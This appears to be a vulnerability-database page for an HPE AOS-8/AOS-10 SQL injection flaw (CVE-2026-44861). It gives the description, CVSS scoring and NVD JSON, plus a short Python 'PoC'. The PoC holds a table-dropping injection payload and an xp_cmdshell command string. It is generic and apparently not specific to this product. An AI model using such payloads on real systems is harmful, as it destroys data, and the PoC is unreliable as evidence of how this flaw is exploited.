Security Vulnerability Report
中文
CVE-2026-44861 CVSS 7.2 HIGH

CVE-2026-44861

Published: 2026-05-12 20:16:45
Last Modified: 2026-05-12 20:16:45

Description

SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE AOS-8 (所有受支持版本)
HPE AOS-10 (所有受支持版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-44861 # Requires Admin access to CLI or Management API import requests target = "https://<target-ip>/api/cli" session_id = "<admin_cookie>" # Payload to inject SQL command leading to RCE # Example: '; exec master..xp_cmdshell 'id' -- payload = "admin' OR '1'='1'; DROP TABLE users; --" headers = { "Authorization": "Bearer " + session_id, "Content-Type": "application/json" } data = { "command": "show_config", "param": payload # Injecting into vulnerable parameter } print(f"Sending payload to {target}...") # response = requests.post(target, json=data, headers=headers, verify=False) # print(response.text) print("If successful, SQL injection occurs, potentially leading to RCE.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44861", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:44.720", "lastModified": "2026-05-12T20:16:44.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}